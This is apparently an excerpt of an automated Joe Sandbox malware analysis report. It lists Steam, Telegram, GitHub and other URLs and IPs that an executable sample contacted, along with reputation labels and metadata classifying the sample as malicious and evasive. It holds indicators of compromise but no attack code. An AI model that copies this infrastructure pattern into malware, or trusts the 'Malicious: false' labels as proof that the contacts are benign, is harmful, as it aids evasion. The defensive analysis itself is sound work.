0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr
Malicious: false
Reputation: high

URL: https://t.me/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000071E000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&amp;l=
Source: 76561199804377619[1].htm0.15.dr
Malicious: false
Reputation: high

URL: http://go.mic&ZX
Source: powershell.exe, 0000000B.00000002.2153183743.00000000033E6000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

URL: https://web.telegram.org
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000076D000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://github.com
Source: YYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002D66000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr
Malicious: false
Reputation: high

URL: https://help.steampowered.com/en/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr
Malicious: false
Reputation: high

URL: https://steamcommunity.com/market/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr
Malicious: false
Reputation: high

URL: https://store.steampowered.com/news/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr
Malicious: false
Reputation: high

URL: https://contoso.com/License
Source: powershell.exe, 0000000E.00000002.2343555484.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=3W_ge11SZngF&amp;l=englis
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr
Malicious: false
Reputation: high

URL: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&amp;
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr
Malicious: false
Reputation: high

URL: http://store.steampowered.com/subscriber_agreement/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr
Malicious: false
Reputation: high

URL: https://steambroadcast.akamaized.ne
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: unknown

URL: https://steamcommunity.com/#
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr
Malicious: false
Reputation: high

URL: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr
Malicious: false
Reputation: high

URL: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&amp
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr
Malicious: false
Reputation: high
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://recaptcha.net/recaptcha/;e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://steamcommunity.com/discussions/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            http://github.comYYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002D6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://store.steampowered.com/stats/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 
76561199804377619[1].htm0.15.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://medal.tve770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
IP               Domain                     Country                     ASN    ASN Name                       Malicious
185.199.109.133  raw.githubusercontent.com  Netherlands                 54113  FASTLYUS                       false
104.102.49.254   steamcommunity.com         United States               16625  AKAMAI-ASUS                    false
37.27.43.98      unknown                    Iran (ISLAMIC Republic Of)  39232  UNINETAZ                       false
20.233.83.145    github.com                 United States               8075   MICROSOFT-CORP-MSN-AS-BLOCKUS  false
149.154.167.99   t.me                       United Kingdom              62041  TELEGRAMRU                     false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579768
Start date and time: 2024-12-23 08:59:01 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: YYjRtxS70h.exe (renamed because original name is a hash value)
Original Sample Name: 5a59ce92b07de68c0be8fbd7944214e2.exe
Detection: MAL
Classification: mal84.evad.winEXE@19/24@4/5
EGA Information:
